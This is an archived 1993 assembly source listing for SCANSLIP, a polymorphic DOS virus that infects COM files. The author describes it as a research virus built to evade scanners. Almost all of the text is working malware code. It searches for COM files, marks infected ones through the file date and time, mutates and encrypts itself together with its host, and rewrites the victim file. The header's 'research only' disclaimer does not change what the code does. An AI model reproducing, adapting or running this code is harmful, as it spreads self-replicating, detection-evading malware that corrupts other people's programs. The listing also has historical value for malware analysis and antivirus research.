home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
PMUPDT13.ZIP
/
DGME.ZIP
/
SCANSLIP.ASM
< prev
next >
Wrap
Assembly Source File
|
1993-12-16
|
9KB
|
197 lines
;SCANSLIP (C) 1993 American Eagle Publications, Inc., All Rights Reserved!
;A small mutation-engine based COM infector which encrypts both the
;virus and the COM file. A real bear for disinfectors.
;This virus uses a modified Trident Polymorphic Engine in combination with the
;Darwinian Genetic Mutation Engine. It will sneak around scanners!
;This Virus for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
.model tiny ;Tiny model to create a COM file
.code
extrn crypt:near ;mutation engine function
extrn host:near ;host program
extrn DEFINE_RANDOM_DNA:NEAR,MUTATE_DNA:NEAR
extrn DNALOC:DWORD,DNALEN:WORD
extrn GENE_GET:NEAR,GENE_PTR:DWORD
;DTA definitions
DTA EQU 0000H ;Disk transfer area
FSIZE EQU DTA+1AH ;file size location in file search
FNAME EQU DTA+1EH ;file name location in file search
ORG 100H
;******************************************************************************
;The virus starts here.
VIRSTART:
call GETLOC
GETLOC: pop si
sub si,3 ;heres where virus starts
push si
mov ax,ds
add ax,1000H
mov es,ax ;upper segment is this one + 1000H
mov di,100H ;move virus there at offset 100H
mov cx,OFFSET HOST - 100H
rep movsb ;this will louse the infection up if run under debug!
mov ds,ax ;set ds to high segment
push ds
mov ax,OFFSET FIND_FILE
push ax
retf ;jump to high memory segment
;Now it's time to find a viable file to infect. We will look for any COM file
;and see if the virus is there already.
FIND_FILE:
pop si
mov [HOSTOFS],si ;need this in high memory
xor dx,dx ;move dta to high segment
mov ah,1AH ;so we don't trash the command line
int 21H ;which the host is expecting
mov dx,OFFSET COMFILE
mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
mov ah,4EH ;DOS search first function
int 21H
CHECK_FILE: jnc NXT1
jmp ALLDONE ;no COM files to infect
NXT1: mov dx,FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc NEXT_FILE
mov bx,ax ;put file handle in bx, and leave it there for the duration
mov ax,5700H ;get file attribute
int 21H
mov ax,cx
xor ax,dx ;date xor time mod 10 = 3 for infected file
xor dx,dx
mov cx,10
div cx
cmp dx,3
jnz INFECT_FILE ;not 3, go infect
NEXT_FILE: mov ah,4FH ;look for another file
int 21H
jmp SHORT CHECK_FILE ;and go check it out
COMFILE DB '*.COM',0
HOSTOFS DW 0
;When we get here, we've opened a file successfully, and read it into memory.
;In the high segment, the file is set up exactly as it will look when infected.
;Thus, to infect, we just rewrite the file from the start, using the image
;in the high segment.
INFECT_FILE:
push bx ;save file handle
mov ax,OFFSET DNA ;set up address of DNA
mov WORD PTR [DNALOC],ax ;for DGME
mov WORD PTR [GENE_PTR],ax
mov ax,cs
mov WORD PTR [DNALOC+2],ax
mov WORD PTR [GENE_PTR+2],ax
mov ax,DNA_LENGTH
mov [DNALEN],ax
mov al,[FIRST] ;is this the first infection?
or al,al
jz MUTATE ;no, mutate the gene
call DEFINE_RANDOM_DNA ;yes, define the DNA sequence to start
jmp SHORT DNA_MODIFIED
MUTATE: call MUTATE_DNA
DNA_MODIFIED: xor al,al
mov [FIRST],al
pop bx
push bx
mov dx,OFFSET HOST ;end of virus
mov di,FSIZE ;if read in first, this gets trashed by the engine
mov cx,cs:[di] ;get file size for reading into buffer
push cx
mov ah,3FH ;DOS read function
int 21H ;read host in
pop cx
add cx,OFFSET HOST - 100H ;size of code to encrypt
mov dx,100H ;ds:dx --> code to encrypt
mov bp,dx ;offset where execution begins
mov di,0
mov si,0
mov ax,ds ;set up work seg for tpe
add ax,1000H
mov es,ax
mov bl,1 ;small model
mov ax,80H
call crypt
pop bx
push dx
push cx
xor cx,cx
mov dx,cx ;reset file pointer to start of file
mov ax,4200H
int 21H
pop cx
pop dx
; mov di,FSIZE
; add cx,cs:[di] ;add host size to size to write
mov ah,40H
int 21H ;write virus+host to file
push cs
pop ds ;ds=cs
mov ax,5700H ;get date & time on file
int 21H
push dx
mov ax,cx ;fix it
xor ax,dx
mov cx,10
xor dx,dx
div cx
mul cx
add ax,3
pop dx
xor ax,dx
mov cx,ax
mov ax,5701H ;and save it
int 21H
EXIT_ERR:
mov ah,3EH ;close the file
int 21H
;The infection process is now complete. This routine moves the host program
;down so that its code starts at offset 100H, and then transfers control to it.
ALLDONE:
mov bx,[HOSTOFS] ;relative offset of program
sub bx,100H ;bx=size of decrypt routine
mov ax,ss ;set ds, es to low segment again
mov ds,ax
mov es,ax
push ax ;prep for retf to host
mov dx,80H ;restore dta to original value
mov ah,1AH ;for compatibility
int 21H
mov di,100H ;prep to move host back to original location
mov si,OFFSET HOST
add si,bx
push di
mov cx,sp ;move code, but don't trash the stack
sub cx,si
rep movsb ;move code
retf ;and return to host
FIRST DB 1 ; = 1 if this is the 1st generation
DNA_LENGTH EQU 100H ;length of DNA for this virus
DNA DB DNA_LENGTH dup (0) ;DNA for this virus
END VIRSTART